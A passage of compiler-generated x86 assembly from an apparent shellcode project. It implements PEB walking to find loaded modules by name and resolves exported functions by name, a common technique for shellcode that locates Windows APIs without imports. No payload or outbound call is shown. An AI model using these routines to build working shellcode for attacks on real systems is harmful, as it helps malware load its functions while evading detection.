	lea	ecx, DWORD PTR [edx+eax*2]
	mov	DWORD PTR _nameIndex$3[ebp], ecx
; Line 193
	mov	edx, DWORD PTR _module$[ebp]
	add	edx, DWORD PTR _funcsListRVA$[ebp]
	mov	eax, DWORD PTR _nameIndex$3[ebp]
	movzx	ecx, WORD PTR [eax]
	lea	edx, DWORD PTR [edx+ecx*4]
	mov	DWORD PTR _funcRVA$1[ebp], edx
; Line 195
	mov	eax, DWORD PTR _nameRVA$2[ebp]
	mov	ecx, DWORD PTR _module$[ebp]
	add	ecx, DWORD PTR [eax]
	mov	DWORD PTR _curr_name$4[ebp], ecx
; Line 196
	mov	DWORD PTR _k$6[ebp], 0
; Line 197
	mov	DWORD PTR _k$6[ebp], 0
	jmp	SHORT $LN7@get_func_b
$LN5@get_func_b:
	mov	edx, DWORD PTR _k$6[ebp]
	add	edx, 1
	mov	DWORD PTR _k$6[ebp], edx
$LN7@get_func_b:
	mov	eax, DWORD PTR _func_name$[ebp]
	add	eax, DWORD PTR _k$6[ebp]
	movsx	ecx, BYTE PTR [eax]
	test	ecx, ecx
	je	SHORT $LN6@get_func_b
	mov	edx, DWORD PTR _curr_name$4[ebp]
	add	edx, DWORD PTR _k$6[ebp]
	movsx	eax, BYTE PTR [edx]
	test	eax, eax
	je	SHORT $LN6@get_func_b
; Line 198
	mov	ecx, DWORD PTR _func_name$[ebp]
	add	ecx, DWORD PTR _k$6[ebp]
	movsx	edx, BYTE PTR [ecx]
	mov	eax, DWORD PTR _curr_name$4[ebp]
	add	eax, DWORD PTR _k$6[ebp]
	movsx	ecx, BYTE PTR [eax]
	cmp	edx, ecx
	je	SHORT $LN10@get_func_b
	jmp	SHORT $LN6@get_func_b
$LN10@get_func_b:
; Line 199
	jmp	SHORT $LN5@get_func_b
$LN6@get_func_b:
; Line 200
	mov	edx, DWORD PTR _func_name$[ebp]
	add	edx, DWORD PTR _k$6[ebp]
	movsx	eax, BYTE PTR [edx]
	test	eax, eax
	jne	SHORT $LN11@get_func_b
	mov	ecx, DWORD PTR _curr_name$4[ebp]
	add	ecx, DWORD PTR _k$6[ebp]
	movsx	edx, BYTE PTR [ecx]
	test	edx, edx
	jne	SHORT $LN11@get_func_b
; Line 202
	mov	eax, DWORD PTR _funcRVA$1[ebp]
	mov	ecx, DWORD PTR _module$[ebp]
	add	ecx, DWORD PTR [eax]
	mov	eax, ecx
	jmp	SHORT $LN1@get_func_b
$LN11@get_func_b:
; Line 204
	jmp	$LN2@get_func_b
$LN3@get_func_b:
; Line 205
	xor	eax, eax
$LN1@get_func_b:
; Line 206
	mov	esp, ebp
	pop	ebp
	ret	0
?get_func_by_name@@YAPAXPAXPAD@Z ENDP			; get_func_by_name
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_module_by_name@@YAPAXPA_W@Z
_TEXT	SEGMENT
_list$ = -52						; size = 8
_Flink$ = -44						; size = 4
_ldr$ = -40						; size = 4
tv151 = -36						; size = 4
tv132 = -32						; size = 4
_peb$ = -28						; size = 4
_curr_module$ = -24					; size = 4
_curr_name$1 = -20					; size = 4
_i$2 = -16						; size = 4
_c2$3 = -12						; size = 2
_c1$4 = -8						; size = 2
tv155 = -4						; size = 2
tv136 = -2						; size = 2
_module_name$ = 8					; size = 4
?get_module_by_name@@YAPAXPA_W@Z PROC			; get_module_by_name, COMDAT
; File c:\users\ronpa\desktop\shellcode\shellcode\peb-lookup.h
; Line 135
	push	ebp
	mov	ebp, esp
	sub	esp, 52					; 00000034H
; Line 136
	mov	DWORD PTR _peb$[ebp], 0
; Line 140
	assume fs:nothing
	mov	eax, DWORD PTR fs:[48]
	mov	DWORD PTR _peb$[ebp], eax
; Line 142
	mov	ecx, DWORD PTR _peb$[ebp]
	mov	edx, DWORD PTR [ecx+12]
	mov	DWORD PTR _ldr$[ebp], edx
; Line 143
	mov	eax, DWORD PTR _ldr$[ebp]
	mov	ecx, DWORD PTR [eax+12]
	mov	edx, DWORD PTR [eax+16]
	mov	DWORD PTR _list$[ebp], ecx
	mov	DWORD PTR _list$[ebp+4], edx
; Line 145
	mov	eax, DWORD PTR _list$[ebp]
	mov	DWORD PTR _Flink$[ebp], eax
; Line 146
	mov	ecx, DWORD PTR _Flink$[ebp]
	mov	DWORD PTR _curr_module$[ebp], ecx
$LN2@get_module:
; Line 148
	cmp	DWORD PTR _curr_module$[ebp], 0
	je	$LN3@get_module
	mov	edx, DWORD PTR _curr_module$[ebp]
	cmp	DWORD PTR [edx+24], 0
	je	$LN3@get_module
; Line 149
	mov	eax, DWORD PTR _curr_module$[ebp]
	cmp	DWORD PTR [eax+48], 0
	jne	SHORT $LN7@get_module
	jmp	SHORT $LN2@get_module
$LN7@get_module:
; Line 150
	mov	ecx, DWORD PTR _curr_module$[ebp]
	mov	edx, DWORD PTR [ecx+48]
	mov	DWORD PTR _curr_name$1[ebp], edx
; Line 152
	mov	DWORD PTR _i$2[ebp], 0
; Line 153
	mov	DWORD PTR _i$2[ebp], 0
	jmp	SHORT $LN6@get_module
$LN4@get_module:
	mov	eax, DWORD PTR _i$2[ebp]
	add	eax, 1
	mov	DWORD PTR _i$2[ebp], eax
$LN6@get_module:
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _module_name$[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	test	eax, eax
	je	$LN5@get_module
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _curr_name$1[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	test	eax, eax
	je	$LN5@get_module
; Line 155
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _module_name$[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	cmp	eax, 90					; 0000005aH
	jg	SHORT $LN11@get_module
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _module_name$[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	cmp	eax, 65					; 00000041H
	jl	SHORT $LN11@get_module
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _module_name$[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	add	eax, 32					; 00000020H
	mov	DWORD PTR tv132[ebp], eax
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _module_name$[ebp]
	mov	ax, WORD PTR tv132[ebp]
	mov	WORD PTR [edx+ecx*2], ax
	mov	cx, WORD PTR tv132[ebp]
	mov	WORD PTR tv136[ebp], cx
	jmp	SHORT $LN12@get_module
$LN11@get_module:
	mov	edx, DWORD PTR _i$2[ebp]
	mov	eax, DWORD PTR _module_name$[ebp]
	mov	cx, WORD PTR [eax+edx*2]
	mov	WORD PTR tv136[ebp], cx
$LN12@get_module:
	mov	dx, WORD PTR tv136[ebp]
	mov	WORD PTR _c1$4[ebp], dx
; Line 156
	mov	eax, DWORD PTR _i$2[ebp]
	mov	ecx, DWORD PTR _curr_name$1[ebp]
	movzx	edx, WORD PTR [ecx+eax*2]
	cmp	edx, 90					; 0000005aH
	jg	SHORT $LN13@get_module
	mov	eax, DWORD PTR _i$2[ebp]
	mov	ecx, DWORD PTR _curr_name$1[ebp]
	movzx	edx, WORD PTR [ecx+eax*2]
	cmp	edx, 65					; 00000041H
	jl	SHORT $LN13@get_module
	mov	eax, DWORD PTR _i$2[ebp]
	mov	ecx, DWORD PTR _curr_name$1[ebp]
	movzx	edx, WORD PTR [ecx+eax*2]
	add	edx, 32					; 00000020H
	mov	DWORD PTR tv151[ebp], edx
	mov	eax, DWORD PTR _i$2[ebp]
	mov	ecx, DWORD PTR _curr_name$1[ebp]
	mov	dx, WORD PTR tv151[ebp]
	mov	WORD PTR [ecx+eax*2], dx
	mov	ax, WORD PTR tv151[ebp]
	mov	WORD PTR tv155[ebp], ax
	jmp	SHORT $LN14@get_module
$LN13@get_module:
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _curr_name$1[ebp]
	mov	ax, WORD PTR [edx+ecx*2]
	mov	WORD PTR tv155[ebp], ax
$LN14@get_module:
	mov	cx, WORD PTR tv155[ebp]
	mov	WORD PTR _c2$3[ebp], cx
; Line 157
	movzx	edx, WORD PTR _c1$4[ebp]
	movzx	eax, WORD PTR _c2$3[ebp]
	cmp	edx, eax
	je	SHORT $LN8@get_module
	jmp	SHORT $LN5@get_module
$LN8@get_module:
; Line 158
	jmp	$LN4@get_module
$LN5@get_module:
; Line 159
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _module_name$[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	test	eax, eax
	jne	SHORT $LN9@get_module
	mov	ecx, DWORD PTR _i$2[ebp]
	mov	edx, DWORD PTR _curr_name$1[ebp]
	movzx	eax, WORD PTR [edx+ecx*2]
	test	eax, eax
	jne	SHORT $LN9@get_module
; Line 161
	mov	ecx, DWORD PTR _curr_module$[ebp]
	mov	eax, DWORD PTR [ecx+24]
	jmp	SHORT $LN1@get_module
$LN9@get_module:
; Line 164
	mov	edx, DWORD PTR _curr_module$[ebp]
	mov	eax, DWORD PTR [edx]
	mov	DWORD PTR _curr_module$[ebp], eax
; Line 165
	jmp	$LN2@get_module
$LN3@get_module:
; Line 166
	xor	eax, eax
$LN1@get_module:
; Line 167
	mov	esp, ebp
	pop	ebp
	ret	0
?get_module_by_name@@YAPAXPA_W@Z ENDP			; get_module_by_name
_TEXT	ENDS
END
